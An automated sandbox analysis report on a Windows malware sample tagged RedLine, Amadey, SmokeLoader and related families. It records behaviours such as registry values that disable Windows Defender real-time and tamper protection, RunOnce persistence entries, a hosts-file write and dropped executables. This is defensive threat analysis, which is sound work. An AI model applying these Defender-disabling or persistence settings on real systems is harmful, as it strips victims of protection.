Malware Analysis Report

2025-01-23 11:32

Sample ID 231010-1lwkrsfc97
Target d5716c2d2f547301ff0b322f76d2a7d012e3e3c0146ef040492ca327cdfef8d8
SHA256 d5716c2d2f547301ff0b322f76d2a7d012e3e3c0146ef040492ca327cdfef8d8
Tags
amadey dcrat glupteba healer redline sectoprat smokeloader 6012068394_99 lutyr magia pixelscloud up3 backdoor discovery dropper evasion infostealer loader persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d5716c2d2f547301ff0b322f76d2a7d012e3e3c0146ef040492ca327cdfef8d8

Threat Level: Known bad

The file d5716c2d2f547301ff0b322f76d2a7d012e3e3c0146ef040492ca327cdfef8d8 was found to be: Known bad.

Malicious Activity Summary

amadey dcrat glupteba healer redline sectoprat smokeloader 6012068394_99 lutyr magia pixelscloud up3 backdoor discovery dropper evasion infostealer loader persistence rat spyware stealer trojan

RedLine payload

SectopRAT payload

Glupteba payload

Suspicious use of NtCreateUserProcessOtherParentProcess

Detects Healer an antivirus disabler dropper

DcRat

Modifies Windows Defender Real-time Protection settings

RedLine

Healer

Glupteba

Amadey

SmokeLoader

SectopRAT

Stops running service(s)

Downloads MZ/PE file

Modifies Windows Firewall

Drops file in Drivers directory

Loads dropped DLL

Reads user/profile data of web browsers

Windows security modification

Checks computer location settings

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Suspicious use of SetThreadContext

Launches sc.exe

Enumerates physical storage devices

Program crash

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Modifies data under HKEY_USERS

Checks SCSI registry key(s)

Suspicious use of UnmapMainImage

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: MapViewOfSection

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-10 21:44

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-10 21:44

Reported

2023-10-10 21:47

Platform

win10v2004-20230915-en

Max time kernel

127s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d5716c2d2f547301ff0b322f76d2a7d012e3e3c0146ef040492ca327cdfef8d8.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Aj29Iy7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\AF69.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\AF69.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\AF69.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\AF69.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\AF69.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\AF69.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Aj29Iy7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Aj29Iy7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Aj29Iy7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Aj29Iy7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Aj29Iy7.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\AA18.bat N/A
Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\FCC0.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5EP7ju9.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\GG2Ha09.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\XD1Kq18.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\uD5ES53.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Aj29Iy7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2rf9479.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3nV70HK.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Hp031bP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5EP7ju9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A35F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jj1mx0an.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A6EA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\vp0qI8nC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\jB9tY4oN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\IU9HJ2Tq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1th20qt9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AA18.bat N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AE11.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AF69.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2VR740tb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FCC0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4DF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AFB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E19.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\4DF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4DF.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Aj29Iy7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Aj29Iy7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\AF69.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\A35F.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jj1mx0an.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\jB9tY4oN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\IU9HJ2Tq.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\XD1Kq18.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\uD5ES53.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\vp0qI8nC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\d5716c2d2f547301ff0b322f76d2a7d012e3e3c0146ef040492ca327cdfef8d8.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\GG2Ha09.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
